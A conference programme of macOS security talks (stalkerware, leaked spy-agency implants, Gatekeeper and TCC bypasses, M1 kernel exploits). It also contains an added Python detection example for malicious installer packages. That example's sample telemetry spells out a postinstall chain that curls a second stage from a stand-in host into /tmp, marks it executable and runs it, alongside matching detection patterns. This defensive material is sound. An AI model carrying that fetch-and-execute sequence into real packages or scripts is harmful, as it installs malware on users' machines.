Presentations


Siri. Find My Ex (⏱️: 25 minutes)
👤 Eva Galperin (@evacide), Director of Cybersecurity EFF (📝: full bio)
Eva Galperin is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world. To that end, she has applied the combination of her political science and technical background to everything from organizing EFF's Tor Relay Challenge, to writing privacy and security training materials (including Surveillance Self Defense and the Digital First Aid Kit), to publishing research on malware in Syria, Vietnam, and Kazakhstan. When she is not collecting new and exotic malware, she practices aerial circus arts and learns new languages.
Cybersecurity often focuses on the threats posed by malicious criminals or government surveillance, but for survivors of intimate partner abuse, surveillance begins at home. This talk will cover the frequently-overlooked threat posed by abusive partners, attackers who often have physical access to and considerable intimate knowledge of their victims.

Galperin will focus on the latest developments in intimate partner surveillance using Apple products, including stalkerware, abuse of location-sharing and other data-sharing settings, and Apple’s recently-debuted physical tracker, the AirTag.

Made In America: Analyzing US Spy Agencies' macOS Implants (⏱️: 50 minutes)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)
👤 Runa Sandvik (@runasand), Security Researcher (📝: full bio)
Patrick Wardle is the founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy.

Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.
Runa Sandvik works on digital security for journalists and other high-risk people. Her work builds upon experience from her time at The New York Times, Freedom of the Press Foundation, and The Tor Project.


Between 2015 and 2017, offensive cyber-espionage tools belonging to several US intelligence agencies were leaked. This gave security researchers a unique opportunity to gain unparalleled insight into the tradecraft, tools, and capabilities of these secretive organizations.

Amongst these leaks were several macOS implants. One, Green Lambert, was leveraged by the Vault7 group (CIA), while another, DoubleFantasy, belonged to the EquationGroup (NSA).

Interestingly these implants did not receive much public attention, nor were they fully analyzed. This talk aims to rectify this by providing a comprehensive analysis of both. Analyzing these old samples, like cyber paleontologists, allows us to better understand the capabilities of their highly sophisticated creators.

Moreover, the malware analysis approaches we present in this talk are applicable to the study of any macOS malware specimen.

All Your Macs Are Belong To Us: The Story of CVE-2021-30657 (⏱️: 50 minutes)
👤 Cedric Owens (@cedowens), Offensive Security Engineer (📝: full bio)
👤 Jaron Bradley (@jbradley89), macOS Detections, Team Lead at Jamf (📝: full bio)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)
Jaron has a background in incident response and threat hunting across Unix based platforms. He currently works as the macOS detections lead for Jamf Protect.

As an OG, he was the first ever speaker at the Objective By the Sea conferences and he makes sure to remind everyone about that each year. Although the conferences are always a blast, he primarily attends for the super ono Hawaiian food.
Cedric is currently a red teamer who came from a blue team background. His passion revolves around red teams and blue teams working closely together to improve each other's tradecraft. Cedric enjoys writing useful red team and blue team utilities and periodically writing posts that are of interest on his blog at https://medium.com/red-teaming-with-a-blue-team-mentaility.
Patrick Wardle is the founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy.

Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.



A recent vulnerability, CVE-2021-30657, neatly bypassed a myriad of foundational macOS security features such as File Quarantine, Gatekeeper, and Notarization. Armed with this capability, attackers could (and did!) hack macOS systems with a simple user (double-)click. Yikes!


In this joint presentation we'll first highlight the discovery of the flaw and how it could be deployed to unsuspecting Mac users. Following this, we'll dig deep into the bowels of macOS to uncover the root cause of the bug: a subtle logic flaw in the complex and undocumented policy subsystem.


Next, we’ll highlight the discovery of malware exploiting this bug in the wild, as a 0-day. To wrap up, we’ll peek at Apple’s patch, as well as discuss novel methods of both detection and prevention.

iOS Reverse Engineering With Frida (⏱️: 50 minutes)
👤 Christine Fossaceca, Senior Mobile Security Researcher & Reverse Engineer at The MITRE Corporation (📝: full bio).
Christine Fossaceca is a senior mobile security researcher and reverse engineer at The MITRE Corporation. Christine is also a part of the @furiousMAC research team. She has experience with Android and iOS. An IDA Pro aficionado, Christine is learning to like Ghidra, too. She also enjoys using Frida to aid her in dynamic analysis, and tries not to let her dog distract her too much.
Are you interested in iOS RE but it seems too daunting to even know where to begin? This talk will show you how easy it is to get started in iOS RE with any PC/Mac, an iPhone, and Frida!

Frida is a dynamic code instrumentation framework that is an essential tool in an iOS reverse engineer's toolbelt. Using Javascript, Frida allows you to inject custom code into a native app on a multitude of platforms. And did I mention it is open source?

Becoming a Yogi on Mac ATT&CK with OceanLotus Postures (⏱️: 50 minutes)
👤 Cat Self (@coolestcatiknow), Lead Adversary Emulation Engineer at The MITRE Corporation (📝: full bio)
👤 Adam Pennington (@_whatshisface), ATT&CK Director at The MITRE Corporation (📝: full bio)
Cat Self is an Adversary Emulation Engineer at The MITRE Corporation and works as the macOS ATT&CK Lead, researching macOS specific malware, advanced persistent threat actors, and techniques.

Cat previously worked as an internal red team operator, threat hunter, and developer at Target Corporate. Cat is an Airborne Military Intelligence veteran with a passion for mentorship, researching all things Apple, and hiking mountains in foreign lands.
Adam Pennington leads ATT&CK at The MITRE Corporation and collected much of the intelligence leveraged in creating ATT&CK’s initial techniques. He has spent much of his 13 years with MITRE studying and preaching the use of deception for intelligence gathering.

Prior to joining MITRE, Adam was a researcher at Carnegie Mellon's Parallel Data Lab and earned his BS and MS degrees in Computer Science and Electrical and Computer Engineering as well as the 2017 Alumni Service Award from Carnegie Mellon University. Adam has presented and published in a number of venues including FIRST CTI, USENIX Security, DEF CON, and ACM Transactions on Information and System Security.


Maybe you've heard about this MITRE ATT&CK® thing, but it’s just for Windows, right? ATT&CK's free knowledge base of adversary behaviors focuses on the real-world tactics, techniques, and procedures seen in actual intrusions, and has quietly covered Macs since 2017.


Macs are a unique security space, and we’ll explore what’s unique about ATT&CK for macOS, and the work we’re doing to improve it in 2021.


Using OceanLotus's macOS activity as a use case, we’ll walk through how organizations can use ATT&CK as a focal point to improve their threat intelligence, detection analytics, adversary emulation and defensive planning.

The Wild World of macOS Installers (⏱️: 50 minutes)
👤 Tony Lambert (@ForensicITGuy), Intelligence Analyst Red Canary (📝: full bio)
Tony is a professional geek who loves to jump into all things related to detection and digital forensics. After working in enterprise IT administration and detection engineering for several years, he now applies his DFIR skills to research malware, detect malicious activity, and recommend pathways for remediation.

Tony is a natural teacher and regularly shares his findings and expertise through blogs, research reports, and presentations at conferences and events.
While malicious email attachments are the initial access mechanism of choice for other platforms, many macOS threats abuse software installers to subvert Apple's security controls and gain access. In some cases, adversaries even eschew including binary content in installation packages and just use the built-in installer structures to retrieve arbitrary content!

In this talk, I'll discuss installation methods that multiple threats have used, from suspected APTs to adware and proof-of-concept code. I'll cover package (PKG) installers with pre- and postinstall scripts, application bundles distributed in DMG files, and third-party library installation using tools such as Python's pip utility. In addition to real-world examples documented in the wild, I'll also show the malware executing, using data from endpoint detection and response (EDR) tooling, to provide ideas for effective analytics.
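The pattern the abstract describes, a package whose postinstall script carries no payload and simply downloads one, is something a detection engineer can hunt for in EDR process telemetry. The following is an added example, not code from the talk or from Red Canary: it walks constructed process events, finds processes that are executing a staged package script, and flags any descendant that fetches a URL, runs inline interpreter code, or executes a file dropped in a temporary directory. The process events, pids, package identifiers and URL are constructed for the example; the `/private/tmp/PKInstallSandbox.*/Scripts/` staging path and the `package_script_service` parent process are assumptions about how macOS runs package scripts, so check them against what your own EDR reports.

```python
"""Added example: flagging package postinstall scripts that fetch a payload.

The events below are constructed to resemble EDR process telemetry; they are
not real data. The PKInstallSandbox script path and package_script_service
parent are assumptions about how macOS stages and runs package scripts.
"""
import re
from collections import defaultdict, deque

# Assumption: installer stages pre/postinstall scripts under this temp path.
SCRIPT_DIR_RE = re.compile(r"^/private/tmp/PKInstallSandbox\.[^/]+/Scripts/")
URL_RE = re.compile(r"https?://", re.I)
# Places a script would typically drop a downloaded second stage.
TEMP_RE = re.compile(r"^(/private)?/(tmp|var/tmp)/|^/Users/Shared/")

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}


def basename(path):
    return path.rsplit("/", 1)[-1]


def is_installer_script(event):
    """True if the process is (or is an interpreter running) a staged package script."""
    return any(SCRIPT_DIR_RE.match(p) for p in [event["path"], *event["args"]])


def classify(event):
    """Why a descendant of an installer script looks like payload retrieval, or None."""
    name, args = basename(event["path"]), event["args"]
    if name in FETCHERS and any(URL_RE.search(a) for a in args):
        return "remote fetch: " + " ".join(args)
    if name in INTERPRETERS and ("-e" in args or "-c" in args):
        return "inline code: " + " ".join(args)
    if TEMP_RE.match(event["path"]) and not is_installer_script(event):
        return "exec from temp: " + event["path"]
    return None


def descendants(pid, children):
    """Breadth-first list of every descendant pid of `pid`."""
    out, queue = [], deque(children.get(pid, []))
    while queue:
        p = queue.popleft()
        out.append(p)
        queue.extend(children.get(p, []))
    return out


def find_suspicious_installs(events):
    """Map each installer-script pid to the reasons its process tree is suspect."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    hits = {}
    for e in events:
        if not is_installer_script(e):
            continue
        reasons = [r for r in (classify(by_pid[p]) for p in descendants(e["pid"], children)) if r]
        if reasons:
            hits[e["pid"]] = reasons
    return hits


# Constructed sample telemetry (hypothetical pids, paths, package ids, URL).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "path": "/usr/sbin/installer",
     "args": ["installer", "-pkg", "/Users/alice/Downloads/Update.pkg", "-target", "/"]},
    {"pid": 101, "ppid": 1, "path": "/System/Library/PrivateFrameworks/PackageKit.framework/"
     "Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service",
     "args": ["package_script_service"]},
    # Malicious package: the postinstall script ships no payload, it downloads one.
    {"pid": 102, "ppid": 101, "path": "/bin/sh",
     "args": ["/bin/sh", "/private/tmp/PKInstallSandbox.Ab12Cd/Scripts/com.example.update.Xy9/postinstall"]},
    {"pid": 103, "ppid": 102, "path": "/usr/bin/curl",
     "args": ["curl", "-fsSL", "https://cdn.example.invalid/stage2", "-o", "/tmp/.stage2"]},
    {"pid": 104, "ppid": 102, "path": "/bin/chmod", "args": ["chmod", "+x", "/tmp/.stage2"]},
    {"pid": 105, "ppid": 102, "path": "/tmp/.stage2", "args": ["/tmp/.stage2"]},
    # Benign package: the postinstall script only registers a launch daemon.
    {"pid": 201, "ppid": 101, "path": "/bin/sh",
     "args": ["/bin/sh", "/private/tmp/PKInstallSandbox.Ef34Gh/Scripts/com.vendor.app.Qr5/postinstall"]},
    {"pid": 202, "ppid": 201, "path": "/bin/launchctl",
     "args": ["launchctl", "load", "/Library/LaunchDaemons/com.vendor.app.plist"]},
    # The same curl from a user's shell: suspicious on its own, but not an installer tree.
    {"pid": 300, "ppid": 50, "path": "/usr/bin/curl",
     "args": ["curl", "-fsSL", "https://cdn.example.invalid/stage2", "-o", "/tmp/.stage2"]},
]

if __name__ == "__main__":
    for pid, reasons in find_suspicious_installs(SAMPLE_EVENTS).items():
        print(f"installer script pid {pid}:")
        for r in reasons:
            print("  -", r)
```

Anchoring the rule on the installer script, rather than on `curl` alone, is what keeps the analytic quiet: the identical download from an interactive shell is not reported. Scripts are matched on both the process path and its arguments because a script with a shebang shows up as `/bin/sh` with the staged path as `argv[1]`. Before installing a package you can read the same scripts statically: `pkgutil --expand Update.pkg /tmp/out` unpacks the flat package so the Distribution file and each component's Scripts can be inspected.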

Mount(ain) of Bugs (⏱️: 50 minutes)
👤 Csaba Fitzl (@theevilbit), Content developer at Offensive Security (📝: full bio)
Csaba graduated in 2006 as a computer engineer. He worked for 6 years as a network engineer, troubleshooting and designing big networks. After that he worked for 8 years as a blue and red teamer focusing on network forensics, malware analysis, adversary simulation and defense bypasses. Currently he is working as a content developer at Offensive Security.

He gave talks and workshops on various international IT security conferences, including Hacktivity, hack.lu, Troopers, SecurityFest, DEFCON, NULLCON and Objective By The Sea.

In this talk we will dive into mount operation internals on macOS and discuss several vulnerabilities that have impacted the system.

In the first half we will introduce how mounting happens and how the sandbox is tied to the mount operation. We will also discuss the diskarbitration service, which is responsible for some of the mounting that users can perform themselves.

Next we will detail different bugs that impacted macOS in the past, where mounting had a key role. These range from privilege escalation to complete privacy (TCC) bypasses.

Lastly we will review how we can use the mount command to our own advantage when exploiting third-party applications.

Pocket Litter - A Peek Inside Your Apple Wallet (⏱️: 25 minutes)
👤 Sarah Edwards (@iamevltwin), Senior Digital Forensics Researcher at Cellebrite (📝: full bio)
Sarah is a Senior Digital Forensics Researcher at Cellebrite working in the DC metro area, specializing in Mac and mobile forensics. She has worked with various federal law enforcement agencies and has performed a variety of investigations including computer intrusions, criminal, and counter-intelligence/terrorism/narcotics.

Sarah’s research interests include anything and everything Apple-related, mobile devices, digital profiling, and Mac and mobile device security. Sarah has presented at many industry security and forensic conferences and is the author/instructor of SANS FOR518 Mac Forensic Analysis and Incident Response.

General acceptance of Apple Wallet, Apple Pay, and the Apple Card has increased in recent years. New capabilities are introduced with every update which means more of your personal data is stored in your Wallet. An amazing amount of information is stored in application data, some of which is synced across devices.

This talk will explore the private details of your life that are stored in your Wallet, such as your recent transactions, detailed locations of items purchased, travel on transit systems, and tickets and passes acquired. Like finding a wallet on the street, it can tell a story about its owner.

n-1 and n-2: Should we really trust in you? (⏱️: 25 minutes)
👤 Josh Long (@theJoshMeister), Chief Security Analyst, Intego (📝: full bio)
Joshua Long (@theJoshMeister) is the Chief Security Analyst at Intego. He is a renowned security researcher, writer, and public speaker, with more than 20 years of experience battling cyber threats. Josh has a master's degree in IT concentrating in Internet Security, and has taken doctorate-level coursework in Business Administration and Computer & Information Security.

Apple has publicly acknowledged Josh for discovering an Apple ID password validation vulnerability. Josh's security research has been featured by tech and mainstream press, including CBS News, CIO, CNET, Lifehacker, The Mac Security Blog, MacTech Magazine, Macworld, Naked Security, The Register, ZDNet, and more.

Apple has a de facto policy about operating system updates on the Mac: security issues get patched for the current and two previous major macOS releases. In other words, the latest major version of macOS (n) as well as last year's release (n-1) and the two-year-old release (n-2) ostensibly get the same security updates. This can be convenient because, in theory, it means that users can stay on an older macOS version for a couple years, for example if their favorite software isn't supported yet on the latest OS, or if the current macOS release won't run on their old Mac hardware.

But is it really true that, by virtue of still getting security updates, older versions of macOS are just as safe as the latest version? Few Mac users and admins are aware that Apple doesn't necessarily patch every security vulnerability in the two previous macOS versions. In this presentation we will seek to quantify, to the degree possible, exactly how safe or unsafe it is to stay on older versions of macOS, and whether or not you should upgrade quickly to each major new release. In our comprehensive analysis, we'll not only compare CVEs addressed—or not addressed—for proprietary and FLOSS components of each macOS version, but we'll also share insights from Mac vulnerability researchers, and with any luck, we'll see if we can learn anything from Apple itself on the subject.

Apple's Envy: Root once, bypass TCC (⏱️: 25 minutes)
👤 Andy Grant (@andywgrant), Head of Offensive Security at Zoom Video Communications, Inc. (📝: full bio)
Andy Grant is the Head of Offensive Security at Zoom. He has more than a decade of professional experience in offensive security, and two decades of involvement in computer security. His team at Zoom is responsible for finding security vulnerabilities in the company and its products, which involves conducting security assessments, performing vulnerability research, and engaging with third-party security vendors. He is also responsible for building out a dedicated red team and leading purple team exercises.

Prior to Zoom, Andy was a Technical Vice President for NCC Group and worked on a wide variety of projects over his twelve years with the company. He performed countless application assessments across many platforms and systems. He also conducted internal and external network penetration tests, architecture and design reviews, and threat modeling exercises. He worked with small tech start-ups, small and large software development groups, and large financial institutions. He has a B.S. in Computer Science and an Advanced Computer Security Certificate, both from Stanford University.

Have you gotten a remote foothold on macOS, even escalated to root, but still been frustrated by TCC? Yeah, me neither. But if you had, you’d want to see this talk!

I'll demonstrate a technique to grant arbitrary applications TCC rights, including Full Disk Access, from a remote compromise. I'll also share a lesser known resource for testing macOS techniques without owning a macOS device, for free.

Plug-n-Play: Using Native Code with Installer Plugins for Initial Access (⏱️: 25 minutes)
👤 Chris Ross (@xorrior), Offensive Security Engineer at Zoom Video Communications, Inc. (📝: full bio)
Chris Ross is an Offensive Security Engineer on the red team at Zoom. He works to build offensive tools and develop new attack techniques for offensive operations.

Chris has a specific interest in macOS post-exploitation toolsets and developing malware.

macOS initial access techniques are somewhat limited for red teamers. Security features such as Gatekeeper, Notarization, and the application sandbox add more complexity to getting a foothold. Amongst all of the payload types for macOS, installer packages provide the most versatility for code execution techniques. Unfortunately, installer scripts and distribution XML in-line JavaScript code execution techniques leave command line artifacts and aren't ideal for stealthy initial access. However, installer plugins provide a neat way to execute Objective-C code. Apple has changed the mechanics of how installer plugins are executed such that the host process for installer plugins is quickly killed after the installer process exits. This presents an interesting dilemma, as attackers will need to find a way to extend the life of their malicious code once executed. In this talk, I'll:
  • Explain how installer plugins work
  • Demonstrate two different methods for code execution via native APIs on macOS
  • Explain how these techniques and installer plugins stack up against the Endpoint Security Framework
  • Share the code with my fellow hackers!

FIDO on MacOS: How it works, Attack Vectors and Other Learnings (⏱️: 25 minutes)
👤 Joel Rennich, Director of Jamf Connect at Jamf (📝: full bio)
Joel Rennich is the director of Jamf's Mac authentication and account management solution, Jamf Connect. Joel joined Jamf as part of the company’s acquisition of NoMAD (later rebranded to Jamf Connect).

WebAuthn and FIDO are quickly becoming the strong-authentication mechanism of choice for many IdPs and their customers. In general this is a very good development, as these technologies have strong support from a wide variety of hardware, operating systems and a growing number of websites. However, it’s also important to understand where the weak points are.

In this session we will cover some basics about why you should care about WebAuthn and FIDO on Apple devices, how it’s built into the OS through the browsers or via an external Security Key, possible attack vectors, and then some learnings for organizations around deploying these technologies. We’ll do some live demos as we go through this showing you the user experience and how potentially malicious code can wedge itself into the transaction.

Kernel Exploitation on Apple's M1 chip (⏱️: 25 minutes)
👤 08tc3wbb (@08tc3wbb), Bug Bounty Hunter and a Security Researcher at ZecOps (📝: full bio)
08tc3wbb is a Bug Bounty Hunter and a Security Researcher at ZecOps, investigating potential attacks and developing various exploits for macOS and iOS.

As the Mac product line gradually enters the M1 chip era, the security posture of macOS on the arm64e architecture is beginning to approach that of iOS. The mitigations that only existed on iOS in the past now also apply to macOS. As well as... the vulnerabilities that only affected iOS in the past are now also brought into macOS. Lol.

AppleAVE2 (AVEVideoEncoder) is a graphics IOKit driver that runs in kernel space and exists only on iOS and M1 chip-based Macs. The complexity of the driver itself and the extensive use of user-kernel memory mapping make it a desirable target for kernel exploitation. I used it to develop kernel exploits for iOS 12 and iOS 13 jailbreaks (CVE-2019-8795, CVE-2020-9907, CVE-2020-9907b).

This talk will explain in detail how Apple "fixed" the AppleAVE2 driver and how we can exploit AppleAVE2 once again to achieve kernel r/w on an M1 MacBook. Finally, I'll share some of my thoughts on post-exploitation.

Environmental Disaster: A LaunchServices Tale (⏱️: 25 minutes)
👤 Ron Waisberg (@epsilan), Product Security at Okta (📝: full bio)
Ron does product security at Okta during the day and tinkers with platform security at night. In his previous role at Trend Micro, you could find him tearing apart patches and writing n-day exploits. To forget about computers he likes to climb, hike, and enjoy a nice beer.

The safety and trust promised by the App Store is in large part due to mandatory sandboxing requirements. The required App Sandbox lets users install apps with abandon and without worry, keeping malicious ones contained. This talk will deep dive into CVE-2021-30677, a logic vulnerability in LaunchServices that allowed an attacker to escape the App Sandbox and bypass privacy protections despite the many new security mechanisms introduced in Big Sur and Catalina.

You'll learn how one deceptively simple issue can be exploited in multiple ways and hopefully have a laugh at the same time. We'll release a tool to help reverse the latest versions of macOS and extend an already great tool to help find & detect vulnerabilities like this one. Finally, we'll lay the groundwork for bugs to come and highlight an obvious but forgotten attack surface.

Anti-Analysis Logic of Arm Malware on macOS (⏱️: 25 minutes)
👤 Patrick Wardle (@patrickwardle), Founder of Objective-See (📝: full bio)

Apple's new M1 systems (aka Apple Silicon) offer a myriad of benefits ...for macOS users, and, well, for malware authors as well.

However, before analyzing malware targeting this platform, one must master various foundational topics such as understanding and reversing arm64 code.

In this talk, we'll cover such topics and then apply them in order to analyze the anti-analysis logic of the first malicious program compiled to natively target Apple Silicon.

Armed (ha!) with the information and analysis techniques presented in this talk, you'll leave well on the way to becoming a proficient macOS M1 malware analyst!

Mac detections by the numbers (⏱️: 25 minutes)
👤 Thomas Reed (@thomasareed), Director of Mac & Mobile at Malwarebytes (📝: full bio)
Thomas Reed has been using Macs since 1984. He is a self-taught security researcher and Director of Mac & Mobile at Malwarebytes.

In his spare time, he is an avid photographer.

Come hear about interesting pieces of Mac malware, and see data relating to their detections. In addition to discovering interesting malware behaviors, you'll learn things like which malware is most common, how malware is distributed globally, and interesting observations about malware artifacts. We'll discuss interesting behaviors of recent malware:
  • Silver Sparrow
  • XcodeSpy
  • ElectroRAT
  • XCSSET
  • ...and more
For each, we'll look at detection data, focusing on what information is most interesting for that malware (e.g., for Silver Sparrow, details about the infamous ._insu file).